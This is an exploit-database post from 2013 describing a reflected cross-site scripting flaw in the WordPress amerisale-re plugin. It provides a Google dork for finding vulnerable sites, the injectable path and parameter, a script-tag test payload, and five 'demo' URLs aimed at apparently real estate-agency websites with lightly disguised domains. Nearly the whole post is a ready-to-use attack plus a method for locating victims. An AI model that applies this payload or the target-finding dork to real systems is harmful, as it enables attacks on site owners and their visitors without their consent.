Home / exploitsPDF  

Wordpress amerisale-re plugin Cross site scripting

Posted on 28 November 2013

#******************************************************************** # Exploit Title : Wordpress amerisale-re plugin Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Google Dork : inurl :wp-content/plugins/amerisale-re # # Date: 2013-11-26 # # Tested on: Windows 7 , Linux ####################### # Exploit : Cross site scripting # # Location : [Target]wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=[xss] # # Script For Test : "/><script>alert(1);</script> ###################### # Demo: # # http://bexleypXroperties.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/><script>alert(1);</script> # # http://c21lynchX.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/><script>alert(1);</script> # # http://garrybrowXnrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/><script>alert(1);</script> # # http://lexingtonteXxasrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/><script>alert(1);</script> # # http://pudowensreXalty.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/><script>alert(1);</script> # ###################### discovered by : ACC3SS ######################

 

TOP